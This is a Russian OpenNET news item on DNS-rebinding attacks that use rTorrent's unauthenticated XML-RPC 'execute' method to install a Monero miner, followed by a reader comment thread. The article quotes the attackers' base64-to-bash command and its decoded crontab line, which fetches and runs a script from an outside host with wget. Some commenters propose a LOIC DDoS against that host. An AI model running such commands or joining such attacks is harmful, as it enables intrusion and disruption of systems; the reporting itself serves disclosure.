The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

02.03.2018 11:37  Атака на системы с rTorrent для скрытого майнинга криптовалюты

Исследователи из компании F5 выявили волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent, использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.

Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод "execute", позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.

Как и в случае с недавней уязвимостью в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном извне, поэтому для отправки команд атакующие применяют технику "DNS rebinding". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.

Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.

Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого на системе пользователя выполняется команда


   echo KGNy...tCg== |base64 -d|bash

которая после декодирования из формата base64 преоборазуется в


    (crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.

Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.



  1. Главная ссылка к новости (https://f5.com/labs/articles/t...)
  2. OpenNews: Уязвимость в BitTorrent-клиенте Transmission, позволяющая выполнить код
  3. OpenNews: Релиз qBittorrent 4.0.0
  4. OpenNews: Проект Elementary OS представил BitTorrent-клиент Torrential
  5. OpenNews: Второй взлом инфраструктуры BitTorrent-клиента Transmission
  6. OpenNews: Релиз BitTorrent-клиента KTorrent 5.0
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: torrent, rtorrent
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, freehck, 12:05, 02/03/2018 [ответить] [смотреть все]    [к модератору]
  • +2 +/
    Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)
     
     
  • 2.3, Аноним, 12:12, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]
  • +6 +/
    Нужно хостеру писать, а не регистратору. Это типичный взломанный сайт с необновлённым WordPress или кривым плагином, на который файлик с payload залили. Таких тысячи.
     
     
  • 3.15, Аноним, 13:12, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]
  • +2 +/
    Заметьте, как на этом сайте всё прекрасно и гармонично CMS, заголовок, его орфо... весь текст скрыт [показать]
     
     
  • 4.18, сайтостроитель, 13:16, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    йа у мамы веб-девелопер и ничем не хуже владельцев мильена аналогичных сайтов-... весь текст скрыт [показать]
     
  • 4.38, sokoloff, 17:28, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    Это вы про 127.0.0.1? :)
     
     
  • 5.79, X4asd, 14:54, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    > Это вы про 127.0.0.1? :)

    заходил сюда -- не плохой сайт

     
  • 3.20, freehck, 13:38, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +2 +/
    > Нужно хостеру писать, а не регистратору.

    Не один ли хрен?

     
  • 2.43, YetAnotherOnanym, 19:18, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    А они в ответ Дорогой сэр, Вы сами обнаружили у себя этот эксплойт, или Вам кт... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.48, Crazy Alex, 21:50, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.
     
     
  • 4.53, freehck, 22:26, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Кстати, а почему бы и нет Предлагаю начать лойс завтра в 11 ... весь текст скрыт [показать]
     
     
  • 5.62, Crazy Alex, 04:16, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    По России? Ок
     
     
  • 6.68, freehck, 11:21, 03/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Я начал, если что.
     
     
  • 7.75, Аноним, 13:30, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Главное следить чтобы 127 0 0 1 не досталось, с DNS rebinding то ... весь текст скрыт [показать]
     
  • 7.78, Аноним, 14:34, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Напрашивается идея потестить https www opennet ru opennews art shtml num 48161... весь текст скрыт [показать]
     
  • 4.74, Аноним, 13:22, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Ударим DDoS ом по майнингу А вы юмористы ... весь текст скрыт [показать]
     
     
  • 5.80, YetAnotherOnanym, 15:49, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Тсссс Не мешайте Не забывайте, что в России уже третий месяц как год волонтёра... весь текст скрыт [показать]
     
  • 5.81, Нанобот, 19:13, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +2 +/
    Запилите кто-нибудь новость анонимы опеннета героически предотвратили атаку на ... весь текст скрыт [показать]
     
  • 2.73, Аноним, 13:16, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Зато по своему забавно Не успели написать новость про взлом трансмишна и отде... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.84, freehck, 21:14, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну драпать на transmission смысла не много У rtorrent основной режим работы -- ... весь текст скрыт [показать]
     
     
  • 4.86, Аноним, 04:39, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Лично я смысл в rtorrent вообще не понял На графическом десктопе гуй выглядит л... весь текст скрыт [показать]
     
     
  • 5.96, freehck, 11:37, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    gt оверквотинг удален rtorrent ... весь текст скрыт [показать]
     
  • 5.103, scorry, 21:27, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Памяти ест меньше, позволяет больше торрентов качать-отдавать Если я правильно ... весь текст скрыт [показать]
     
     
  • 6.108, Аноним, 08:19, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Трансмишн даже на роутере с 32 метрами по минимуму юзабелен На 64 грузит бочкам... весь текст скрыт [показать]
     
     
  • 7.116, scorry, 11:05, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Я верю вашему опыту и уважаю вашу точку зрения Но, как пользовавший оба клиента... весь текст скрыт [показать]
     
     
  • 8.119, Аноним, 15:09, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    У трансмишна настройки есть, знаете ли А чтобы АРГУМЕНТИРОВАННО заявлять надо н... весь текст скрыт [показать]
     
     
  • 9.122, scorry, 15:34, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае ... весь текст скрыт [показать]
     
     
  • 10.123, Аноним, 16:18, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ах, под аргументированно имелось в виду загибание пальцев и размахивание сакраль... весь текст скрыт [показать]
     
     
  • 11.125, scorry, 02:08, 10/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Нет Трансмишн лучше, я не умею его готовить, а аноним всё знает лучше ... весь текст скрыт [показать]
     
  • 1.2, freehck, 12:10, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    > В ходе атаки в систему устанавливается собранный для unix-подобных
    > систем инструментарий для майнинга криптовалюты Monero (XMR). На
    > текущий момент на одном из связанных с атакой кошельков уже накопилось
    > 13 XMR, что соответствует примерно 4200 долларам США.

    Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
     
  • 2.4, Аноним, 12:20, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +5 +/
    То что он смекалистый опровергает последняя строка кода с chmod И вообще, смека... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.12, Аноним, 12:57, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    А может он намеренно косит под дурачка, чтоб его не нашли ... весь текст скрыт [показать]
     
  • 3.14, имя, 13:01, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +2 +/
    в чем проблема с chmod добавляет права на выполнение, запускает и затем удаляет... весь текст скрыт [показать]
     
     
  • 4.42, RM, 19:10, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +6 +/
    Я так понимаю что продвинутые админы монтируют /tmp с noexec, вот это и есть проблема конкретного chmod
     
     
  • 5.49, Crazy Alex, 21:51, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Так то продвинутые
     
  • 2.16, Аноним, 13:13, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Смекалистый не спалился бы ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.77, Аноним, 14:31, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Так спалился всего лишь какой-то бот Если бы спалился владелец - он бы уже ожид... весь текст скрыт [показать]
     
  • 2.19, Iaaa, 13:19, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Кто-то за такие деньги 2 месяца пашет, а взломщик вор, бандит, громила, разводи... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.39, Аноним, 18:51, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Вор бандит громила - хз что это разводила такую сложную схему за всю жизнь не ... весь текст скрыт [показать]
     
     
  • 4.61, angra, 02:25, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +3 +/
    То есть для тебя тоже вопрос не в этике, а в сложности Ну так здесь ведь тоже п... весь текст скрыт [показать]
     
     
  • 5.66, Аноним, 10:31, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    И чем же схема разбить окно и вытащить все ценное сложнее чем схема в топике ... весь текст скрыт [показать]
     
     
  • 6.70, angra, 12:10, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Ну ты попробуй, а потом на зоне тебе объяснят, в чем ты ошибся Или ты про ключе... весь текст скрыт [показать]
     
  • 5.87, Аноним, 10:20, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    И в этом тоже К тому же сложным и казалось бы криминальным начинаниям часто нах... весь текст скрыт [показать]
     
  • 2.28, Ю.Т., 15:04, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –1 +/
    Распотешил момент насчёт прибития конкурентных майнилок ... весь текст скрыт [показать] [показать ветку]
     
  • 2.60, angra, 02:16, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +4 +/
    В большинстве мест, где я работал сисадмином, у меня была возможность проявить ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.64, freehck, 10:13, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Не, ну у нас-то по работе ресурс уже готовый -- бери и пользуйся А этот парнишк... весь текст скрыт [показать]
     
     
     
    Часть нити удалена модератором

  • 5.83, freehck, 21:08, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Надо же, коммуняжки пожаловали Угу А мир у нас чётко делится на чёрное и бе... весь текст скрыт [показать]
     
     
  • 6.85, angra, 23:25, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Я был студентом в другом городе в 90-е, на месяц у меня из финансов было около ... весь текст скрыт [показать]
     
     
  • 7.88, Аноним, 10:24, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    С другой стороны это уменьшает число дырявых сайтиков С которых могли бы и ддос... весь текст скрыт [показать]
     
  • 7.104, freehck, 15:07, 05/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну хз, я был студентом в конце нулевых, и на 2000 деревянных в месяц при 100 й з... весь текст скрыт [показать]
     
  • 7.105, freehck, 16:06, 05/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    А вот мимо этого так же просто, как и мимо остального, пройти уже просто невозмо... весь текст скрыт [показать]
     
     
  • 8.109, Аноним, 08:27, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Офигенный опус мыслящего человкеа Возможно, им больше нравится протирать штаны ... весь текст скрыт [показать]
     
     
  • 9.110, Ю.Т., 08:34, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ладно, ладно Ни чудес, ни сверхчеловеков не бывает А поскольку энтропию убить ... весь текст скрыт [показать]
     
     
  • 10.111, Аноним, 09:10, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Зато бывают лохи-по-жизни догадайтесь на кого я намекаю и те кто ими беспринци... весь текст скрыт [показать]
     
     
  • 11.117, Ю.Т., 16:29, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Недочеловеков тоже не бывает Да какое-такое назидание Должны быть в таком ви... весь текст скрыт [показать]
     
     
  • 12.120, Аноним, 15:25, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Мне бы хотелось так думать, и к этому надо стремиться наверное Но когда кем-то ... весь текст скрыт [показать]
     
  • 6.97, Аноним, 11:43, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Лично я знаю, что студенческий проездной стоит копейки, и каждый день рисковать ... весь текст скрыт [показать]
     
     
  • 7.115, Аноним, 09:48, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Он стоит копейки по меркам нормального человека Который может профитом заняться... весь текст скрыт [показать]
     
  • 6.99, Ю.Т., 11:57, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Поздравляю, вы только что переоткрыли относительный классовый характер морали,... весь текст скрыт [показать]
     
     
  • 7.112, Аноним, 09:15, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ваша же высокая мораль обычно сводится к тому, чтобы сидя в гадюшне с голым задо... весь текст скрыт [показать]
     
     
  • 8.118, Ю.Т., 16:32, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Причём здесь наша высокая мораль Поскипанное -- ваша проекция ... весь текст скрыт [показать]
     
     
  • 9.121, Аноним, 15:31, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    При чем Практика показала что обычно это сводится к чему-то такому Высокие иде... весь текст скрыт [показать]
     
     
  • 10.124, Ю.Т., 16:28, 09/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Практика Но вы это всё только по худ литературе и знаете А наукой доказано ... весь текст скрыт [показать]
     
  • 4.72, Fedd, 13:13, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Спорю ребята из project-zero идейку подсказали https bugs chromium org p proje... весь текст скрыт [показать]
     
  • 2.76, Аноним, 13:34, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –1 +/
    А еще менее смекалистые за столько могут и год-два пахать Да еще таская какие-н... весь текст скрыт [показать] [показать ветку]
     
  • 1.5, anonymous, 12:26, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    охренеть. какой ... такое проектировал?
     
     
  • 2.7, IB, 12:33, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +5 +/
    В смысле кто проектировал такой DNS Знают, борются, но legacy С какого перепуг... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.29, Аноним, 15:08, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    С такого перепугу, что эти атаки не вчера придумали.
     
  • 3.54, Аноним, 22:38, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    с какого перепугу докальное приложение испаользует сетевые порты а не Unix Domai... весь текст скрыт [показать]
     
     
  • 4.58, Аноним, 23:38, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    По умолчанию оно ни то, ни другое не использует, порты и unix-сокеты открываются... весь текст скрыт [показать]
     
  • 3.89, Аноним, 10:25, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    С такого что внезапно вебпага в браузере может взять да и попросить localhost И... весь текст скрыт [показать]
     
  • 1.6, Яйцассыром, 12:33, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • –2 +/
    >> а также убивает все процессы sshd.

    Подскажите, с каких это пор, в этих наших линуксах, кто-попало может кильнуть процесс запущенный от другого пользователя?

     
     
  • 2.8, Аноним, 12:40, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +3 +/
    Ну ты попробуй прибей обычным юзером sshd от рута запущенный, потом расскажи об ... весь текст скрыт [показать] [показать ветку]
     
  • 2.10, imho, 12:46, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +2 +/
    А кто сказал что он чужие убивает?
     
     
  • 3.17, нах, 13:13, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    ну как бы редко sshd запускают от юзера, лазящего по порносайтам хотя ... весь текст скрыт [показать]
     
  • 2.11, Аноним, 12:56, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Если кто-то уже вломился в систему, то скорее всего под тем же юзером А если не... весь текст скрыт [показать] [показать ветку]
     
  • 1.13, Аноним, 12:57, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    т е если rtorrent висит на отдельном компе, бояться нечего еще и запущен под ю... весь текст скрыт [показать]
     
     
  • 2.21, Аноним, 13:52, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –3 +/
    Что там исправлять По умолчанию xmlrpc-интерфейс выключен Если кто-то его вклю... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.27, нах, 14:42, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    авторизацию и transmission туда же Кстати, зачем вообще какому-то торренту ум... весь текст скрыт [показать]
     
     
  • 4.35, Аноним, 15:59, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Курочка по зёрнышку клюёт Вот эта на 4200 наклевала, может и ещё успеет, пока ... весь текст скрыт [показать]
     
  • 4.56, Аноним, 23:32, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +2 +/
    Там она не предусмотрена, для авторизации предписывается использовать функционал... весь текст скрыт [показать]
     
     
  • 5.57, Аноним, 23:34, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > записанный .bashrc

    Или .ssh/authorized_keys.

     
  • 5.95, Аноним, 10:44, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Офигенное оправдание api без авторизации Знаете, если RPC api в результате може... весь текст скрыт [показать]
     
     
  • 6.100, Аноним, 16:11, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Может быть, ещё в bash сделать авторизацию при запуске интерактивной сессии Или... весь текст скрыт [показать]
     
     
  • 7.113, Аноним, 09:33, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Если внешняя страница в браузере сможет вызывать bash угодным ей образом - то та... весь текст скрыт [показать]
     
  • 4.90, Аноним, 10:29, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Без стремных RPC жизнь скучна В трансмишне exec не было, но была настройка выпо... весь текст скрыт [показать]
     
  • 2.22, Аноним, 13:52, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –1 +/
    А что ты собрался тут исправлять Все работает так, как мы надизайнили ц Тут ... весь текст скрыт [показать] [показать ветку]
     
  • 1.23, Аноним, 14:14, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • +4 +/
    ну вот, раньше вирусы на дисках место освобождали, сжимая и распаковывая програм... весь текст скрыт [показать]
     
  • 1.25, Аноним, 14:26, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +2 +/
    Дожили
    конкурирующие вредоносные системы майнинга
    на компе подцепить можно

     
     
  • 2.41, Диалектик, 19:05, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Воспринимай это как новый виток борьбы за безопасность ПО на машинах пользовател... весь текст скрыт [показать] [показать ветку]
     
  • 2.50, Crazy Alex, 22:18, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +4 +/
    Вирусы друг друга в винде, помнится, тоже выносили
     
     
  • 3.67, ПупкинВасуасилий, 11:20, 03/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Не помню такого, чтобы выносили Черви, после заражения, которые в системе дыру ... весь текст скрыт [показать]
     
  • 3.91, Аноним, 10:32, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Да и на всяких роутерах вирусы друг друга зачастую выпихивают, чтобы конкурент м... весь текст скрыт [показать]
     
  • 1.26, Аноним, 14:39, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    А если использовать в network scgi open_port произвольный порт, вместо обычного ... весь текст скрыт [показать]
     
     
  • 2.51, Crazy Alex, 22:19, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    Почти наверняка
     
  • 2.82, Аноним, 20:35, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    хотя нет, запрос идет не напрямую к rtorrent, поэтому нужно поменять на хост, о... весь текст скрыт [показать] [показать ветку]
     
  • 1.30, iZEN, 15:10, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • –5 +/
    А если просто не устанавливать и не использовать bash?
     
     
  • 2.32, Аноним, 15:44, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +3 +/
    Автор заменит в скрипте bash на sh. Удачи в его выкидывании.
     
     
  • 3.47, iZEN, 21:48, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –5 +/
    Думаете, автор догадается, что башизмы не везде работают?
     
     
  • 4.55, Аноним, 23:25, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Там башизмов почти что нет, а что есть 8212 не критично Майнера всяко запуст... весь текст скрыт [показать]
     
  • 2.59, Led, 00:55, 03/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +2 +/
    Тебя маководы за это того своим сделают ... весь текст скрыт [показать] [показать ветку]
     
  • 2.94, Аноним, 10:38, 04/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    По-моему со сменой порта или авторизацией идея умнее разика так в три ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.98, Аноним, 11:51, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Со сменой порта 8212 точно иакая же глупая ... весь текст скрыт [показать]
     
     
  • 4.114, Аноним, 09:39, 07/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Это в теории А на практике делать портскан через DNS rebinding очень напряжно и... весь текст скрыт [показать]
     
  • 2.101, Michael Shigorin, 16:54, 04/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –2 +/
    Предпочитаете tcsh exe ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.102, Аноним, 20:41, 04/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    sh причем именно отдельный, а не алиас на ash Хотя, в контексте новости - все ... весь текст скрыт [показать]
     
  • 3.106, ыы, 21:38, 05/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    cmd
     
  • 1.34, Ващенаглухо, 15:51, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Что за хрень?, rtorrent запущен, но не открывает он портов на 127.1
     
     
  • 2.36, Аноним, 16:08, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    он открывает на том что написано в scgi open_port, если там localhost, а в etc ... весь текст скрыт [показать] [показать ветку]
     
  • 1.40, Аноним, 18:56, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
  • –2 +/
    рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.
     
     
  • 2.44, YetAnotherOnanym, 19:26, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Щас прибежит юное модное дарование и объяснит тебе, что CLI - это настолько поза... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.45, Аноним, 19:37, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    И правда, зачем учиться говорить, если можно обходиться жестами?
     
  • 3.46, VimCoder, 19:41, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –2 +/
    Программист не человек?
     
  • 2.52, Crazy Alex, 22:22, 02/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Была бы не нужна, если б умел сортировку закачек Нет, не 1 6, а по размеру, н... весь текст скрыт [показать] [показать ветку]
     
  • 2.93, Аноним, 10:36, 04/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    А еще она дико тормозит и в ней решительно невозможно понять что вообще клиент д... весь текст скрыт [показать] [показать ветку]
     
  • 1.69, Аноним, 11:31, 03/03/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?
     
     
  • 2.92, Аноним, 10:34, 04/03/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    Замени кошель на свой и перезапусти И пусть себе майнит дальше ... весь текст скрыт [показать] [показать ветку]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor